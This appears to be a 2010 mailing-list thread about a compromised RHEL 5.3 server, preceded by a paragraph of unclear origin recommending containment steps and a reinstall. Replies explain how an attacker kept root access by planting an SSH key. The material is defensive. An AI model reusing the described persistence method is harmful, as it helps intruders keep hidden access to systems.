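On the real host the calls are `remove_key /root/.ssh/authorized_keys 'AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH...'` with the full blob from the history above, and `audit_sshd_config /etc/ssh/sshd_config` followed by a restart of sshd once the setting is changed. Both are containment, not recovery: the history shows software fetched and started from /var/tmp, so the reinstall Bohdan and Robert recommend still stands.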

 
Old 01-28-2010, 12:03 PM
"Marti, Robert"
 
help

Also, you said you're running 5.3 - which kernel version? IIRC there was a remote privilege issue that's been fixed, but not if you don't update.

Sent from my iPhone

On Jan 28, 2010, at 6:56, "mark" <m.roth@5-cent.us> wrote:

> Joy Methew wrote:
>> Hello all,
>> I am using RHEL5.3 as my mail server with a real IP. I configure my system mostly remotely. The last login to my system was on 27 Jan from this IP: 118.129.153.43.
>> Then I tried to log in on the morning of 28 Jan, but I could not authenticate as root with my last password.
>> Then I rebooted the system and reset my password.
>> I logged in as root and ran the "last" command; I am sending the first 10 lines of its output. I think someone hacked my system. I am also sending the history command output.
>> Now I have removed the .ssh directory and /var/tmp/*.
>>
>> Please suggest what this is.
> <snip>
>
> Copy your /root/.ssh/authorized_keys to a backup name, and edit the existing one to remove the last one or two, but REMOVE THE KEY YOU SEE IN THERE THAT MATCHES THE ONE IN THE ECHO COMMAND. Otherwise, your attacker will just get in *without* a password, just an exchange of public and private keys via ssh.
>
> mark
>
 
